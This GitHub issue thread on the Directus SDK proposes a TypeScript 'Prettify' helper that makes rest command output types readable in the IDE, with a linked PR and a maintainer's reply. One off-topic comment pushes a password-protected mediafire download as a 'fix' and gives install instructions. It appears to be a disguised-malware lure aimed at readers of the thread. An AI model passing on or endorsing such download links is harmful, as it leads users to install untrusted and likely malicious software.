### ISSUE TITLE
SDK: prettify rest command output type in IDE

### ISSUE THREAD

**Issue by fapspirit** [directus/directus#23493]
### Describe the Improvement

Output type of the `readItem` or similar commands is hardly readable in the IDE. Take a look at this example:

```typescript
import { type CompleteSchema, type DirectusUser, createDirectus, rest, readItem } from "@directus/sdk";

type TestEntity = {
    id: string;
    user: DirectusUser<Schema>;
    name: string;
    nickname: string | undefined;
};

type Schema = CompleteSchema<{
    testEntity: TestEntity[] ;
}>;

const client = createDirectus<Schema>("").with(rest());

const data = await client.request(readItem("testEntity", "1", {
    fields: ["id", "nickname", { user: ["id"] }]
}));
```

If I hover over the `data` variable to see the type, VSCode will show me this:

<img width="570" alt="image" src="https://github.com/user-attachments/assets/b6b2eb7d-374e-46b1-8762-1d8d10876bdd">

There is a way to improve DX by "prettifying" complex types by leveraging a saving of "computed" type via TS mapping types (see this article for details: https://www.totaltypescript.com/concepts/the-prettify-helper).

I've already implemented this in my fork of Directus (see [commit](https://github.com/directus/directus/pull/23494/commits/c521ec4a9239ac30bf0ee9a55681b61731e5f21e)) and here what I got for the same code snippet:
<img width="489" alt="image" src="https://github.com/user-attachments/assets/dea63851-f641-44ae-81a0-0873e9cdfb41">

I think this change might improve DX without any drawbacks and also simplify usage of type aliases to stay in sync with actual data shape that we get from the API when using `fields` in the query of a command.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by fapspirit** [comment]
@hanneskuettner thank you for assigning this issue to me. I've created and linked PR (#23494), Is there anything I need to do to get someone on the team to look at it?

**Comment by hanneskuettner** [comment]
No, you're all good and thank you for the contribution! Our team will have a look at it, once we find the time in our review cycle.
